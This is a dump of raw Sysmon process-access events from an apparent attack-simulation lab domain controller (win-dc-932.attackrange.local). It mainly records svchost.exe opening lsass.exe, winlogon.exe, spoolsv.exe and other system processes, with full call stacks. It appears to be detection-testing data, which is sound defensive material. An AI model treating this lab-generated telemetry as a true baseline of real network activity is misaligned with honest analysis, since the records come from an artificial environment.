12:24:44.235{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2300-00000000BA01}2704C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441115Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2200-00000000BA01}2628C:\Windows\System32\spoolsv.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441114Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA2-6086-2000-00000000BA01}2472C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441113Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE9A-6086-1F00-00000000BA01}1952C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441112Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1700-00000000BA01}1340C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441111Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1600-00000000BA01}1240C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441110Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441109Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1400-00000000BA01}1052C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441108Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1300-00000000BA01}1028C:\Windows\system32\dwm.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441107Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441106Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1100-00000000BA01}340C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441105Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1000-00000000BA01}364C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441104Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0F00-00000000BA01}104C:\Windows\system32\LogonUI.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441103Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441102Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0D00-00000000BA01}900C:\Windows\system32\svchost.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441101Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441100Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.234{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0900-00000000BA01}568C:\Windows\system32\winlogon.exe0x101001C:\Windows\SYSTEM32\ntdll.dll+a79c4|c:\windows\system32\lsm.dll+221bf|c:\windows\system32\lsm.dll+220f4|c:\windows\system32\lsm.dll+a754|c:\windows\system32\lsm.dll+227dd|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441099Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.229{42DC5269-CE99-6086-1500-00000000BA01}12007100C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+2870|c:\windows\system32\themeservice.dll+26d8|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441098Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.224{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441097Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.224{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441096Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.224{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441095Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.224{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441094Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.219{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441093Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.219{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441092Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.212{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4CD-6086-EC04-00000000BA01}4652C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441091Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.212{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4CD-6086-EC04-00000000BA01}4652C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441090Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.210{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2200-00000000BA01}2628C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441089Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.190{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441088Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.190{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441087Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.185{42DC5269-D4D0-6086-FD04-00000000BA01}1144684C:\Windows\Explorer.EXE{42DC5269-1583-6087-F40C-00000000BA01}5820C:\Program Files\OpenJDK\jdk-16.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441086Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.185{42DC5269-D4D0-6086-FD04-00000000BA01}1144684C:\Windows\Explorer.EXE{42DC5269-1583-6087-F40C-00000000BA01}5820C:\Program Files\OpenJDK\jdk-16.0.1\bin\java.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 